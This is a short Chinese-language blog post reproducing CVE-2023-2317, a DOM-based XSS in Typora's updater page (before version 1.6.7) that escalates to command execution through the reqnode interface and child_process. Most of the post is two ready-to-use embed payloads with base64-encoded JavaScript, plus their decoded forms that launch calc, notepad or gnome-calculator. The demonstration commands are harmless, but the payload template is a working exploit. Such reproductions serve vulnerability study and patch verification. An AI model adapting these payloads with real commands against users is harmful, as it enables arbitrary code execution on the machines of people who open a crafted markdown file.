Windows和Linux版本1.6.7之前的Typora中的updater/update.html中存在基于DOM的XSS,该漏洞允许通过加载特制的markdown文件从而使得执行任意JavaScript代码。
如果用户打开恶意markdown文件或者从恶意网页复制文本并将其粘贴到Typora,通过在<embed>标签中引用update.html,则可以利用此漏洞,此外,攻击者可以使用特权接口reqnode访问节点模块child_process并执行任意系统命令。
漏洞复现
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
```
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
```
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ25vdGVwYWQgd3d3LmV4cHBvYy5vcmcnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
```
reqnode('child_process').exec(({Win32: 'notepad www.exppoc.org', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
```![图片[1]-【漏洞复现】Typora 远程代码执行漏洞(CVE-2023-2317)-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/1.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![图片[2]-【漏洞复现】Typora 远程代码执行漏洞(CVE-2023-2317)-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/2.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![图片[3]-【漏洞复现】Typora 远程代码执行漏洞(CVE-2023-2317)-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/3.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![图片[4]-【漏洞复现】Typora 远程代码执行漏洞(CVE-2023-2317)-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/4.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
© 版权声明
THE END
![表情[keai]-铭心博客](https://www.imxbk.com/wp-content/themes/zibll/img/smilies/keai.gif)
暂无评论内容